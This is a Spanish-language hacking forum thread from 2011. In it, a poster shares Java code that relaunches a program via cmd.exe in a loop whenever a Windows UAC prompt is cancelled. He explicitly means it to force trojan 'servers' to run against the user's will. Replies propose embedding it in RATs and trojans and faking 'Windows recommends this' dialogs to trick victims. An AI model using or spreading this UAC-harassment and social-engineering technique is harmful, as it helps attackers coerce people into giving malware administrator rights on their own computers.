Página 1 de 2

El Fastidioso UAC, aprovechandolo para ejecución 90% segura.

Publicado: 31 Oct 2011, 17:43
por adwind
Lo posteo aqui por que es mensaje entre nosotros, y aqui explico un pequeño detalle en cuanto ejecucion de archivos en windows 7.

Bueno a como ya se han dado cuenta cuando quieren ejecutar un exe en windows 7 con el uac activado entonces les aparece la molestosa ventanita de aceptacion. Que si le dan a no o cierran la ventana el archivo no se ejecuta, esto es malo para los servers, bueno lo que podemos implementar es hacer un bucle con un ejecutable externo que haga la ejecucion con un cmd.exe /c "archivo.exe" el cual si tiene manifiesto de administrador aparecera la ventanita. y en cualquier lenguaje creamos el proceso con esos comandos si el comando se ejecuta correctamente devolvera "0" y si no un 1, entonces si devuelve "1" que le vuelva a aparecer la ventanita de ejecucion XD

Este es un simple ejemplo en java que ejecuta el regedit hasta que le den aceptar XD.

[syntax="java"]
import java.io.IOException;


class regedit {
public static void main(String[] args) throws IOException, InterruptedException {


while(true){

Process aa=null;

aa= Runtime.getRuntime().exec(new String[]{"cmd.exe","/c","regedit.exe"});

aa.waitFor();

System.out.println(aa.exitValue());
//Cuando el proceso se ejecuta correctamente cmd.exe devuelve un 0 y si hay un error o cancelacion devuelve 1
if (aa.exitValue()==1)
continue;
else
break;

}


}
}
[/syntax]

Espero hechen a andar sus cabecitas y lo sepan implementar XD mas obvio no puede ser.

Saludos by Adwind....

Re: El Fastidioso UAG, aprovechandolo para ejecución 90% seg

Publicado: 31 Oct 2011, 17:58
por DaPimp
hmmmm esta buena la idea Adwind...
solo una observacion:

es UAC no "UAG"

User
Access
Control

o en español

Control de Acceso de Usuarios (si no estoy mal)

seria e ver como se implementa esa idea.

saludos.

Re: El Fastidioso UAG, aprovechandolo para ejecución 90% seg

Publicado: 31 Oct 2011, 18:09
por adwind
Perdon por mi spanish XD XD jajajaja algun moderador que lo pueda corregir, ya que con eso que no podemos editar los post XD

Re: El Fastidioso UAC, aprovechandolo para ejecución 90% seg

Publicado: 31 Oct 2011, 19:46
por Harker_123
Es buenísima la idea, así que cuando le hace doble click al archivo no tiene vuelta atrás, salvo apagar. Se tendría que bindear el archivo y hacer que se ejecute este y no el server, verdad?
Saludos!

Re: El Fastidioso UAC, aprovechandolo para ejecución 90% seg

Publicado: 31 Oct 2011, 21:45
por faria89
seria buena idea implementarlos en los rat

Re: El Fastidioso UAC, aprovechandolo para ejecución 90% seg

Publicado: 01 Nov 2011, 00:12
por selanabar
Harker_123 escribió:Es buenísima la idea, así que cuando le hace doble click al archivo no tiene vuelta atrás, salvo apagar. Se tendría que bindear el archivo y hacer que se ejecute este y no el server, verdad?
Saludos!
Creo que la idea seria meterlo en el código del troyano

Re: El Fastidioso UAC, aprovechandolo para ejecución 90% seg

Publicado: 01 Nov 2011, 01:54
por KHC
Esta bien la idea, pero creo que seria bastante obvio xD pero la mayoria terminaria clickeando Aceptar! xD

Re: El Fastidioso UAC, aprovechandolo para ejecución 90% seg

Publicado: 01 Nov 2011, 17:17
por adwind
Si lo que importa es que se ejecutara forzosamente aunque el usuario quiera o no XD, esa es la idea. Se que suena descabellado, pero tampoco le vas a mostrrar un mensaje "Estas infectado ¬¬"

Re: El Fastidioso UAC, aprovechandolo para ejecución 90% seg

Publicado: 01 Nov 2011, 19:18
por selanabar
Y si haces aparecer una ventana que diga que windows recomienda la ejecucion, o que es vital para el sistema.

Re: El Fastidioso UAC, aprovechandolo para ejecución 90% seg

Publicado: 01 Nov 2011, 20:42
por Leizerbick
adwind escribió:Si lo que importa es que se ejecutara forzosamente aunque el usuario quiera o no XD, esa es la idea. Se que suena descabellado, pero tampoco le vas a mostrrar un mensaje "Estas infectado ¬¬"
...
Tienes una imaginacion mounstrosamente efectiva adwin, gracias, un saludo.

Re: El Fastidioso UAC, aprovechandolo para ejecución 90% seg

Publicado: 01 Nov 2011, 20:47
por davidad
selanabar escribió:Y si haces aparecer una ventana que diga que windows recomienda la ejecucion, o que es vital para el sistema.
creo que para eso abria que modificar archivos del sistema no?

esto me parece un metodo muy bueno, me gusta!

Re: El Fastidioso UAC, aprovechandolo para ejecución 90% seg

Publicado: 01 Nov 2011, 21:52
por selanabar
davidad escribió:
selanabar escribió:Y si haces aparecer una ventana que diga que windows recomienda la ejecucion, o que es vital para el sistema.
creo que para eso abria que modificar archivos del sistema no?
la verdad no se mucho, pero para hacer aparecer una ventanita que diga lo que tu quieras hace falta eso?

Re: El Fastidioso UAC, aprovechandolo para ejecución 90% seg

Publicado: 01 Nov 2011, 23:50
por davidad
nooo por diosss para eso no!!! xDD

Imagen


yo me referia a que al aparecer dicha ventana en vez de poner:"Un programa no identificado...." que pusiera "Un programa del sistema requiere privilegios de sistema...

a eso me referia yo a que se necesitaria modificar erchivos propios del sistema, o no?

Re: El Fastidioso UAC, aprovechandolo para ejecución 90% seg

Publicado: 01 Nov 2011, 23:54
por selanabar
am ok, yo me referia ha hacer aparecer una ventana tu diciendo que windows recomienda la instalacion, o que la necesita, ademas de volver a ejecutar el programa si le dan a cancelar. yo creo que con eso el 98% pica.

Re: El Fastidioso UAC, aprovechandolo para ejecución 90% seg

Publicado: 02 Nov 2011, 00:03
por davidad
puedes hacer otra ventana pero seria aparte, incluso creo que si la ventana la incluye el programa principal, 1º saldria la ventanita anterior y despues la tuya haciendo tu ventana un poco inutil...
Sol1: hacer 2 programas, intentando que en el programa detu ventanita no salte la UAC sino estamos igual que antes.

y querer redirigir el efecto del boton cancelar seria bastante dificil...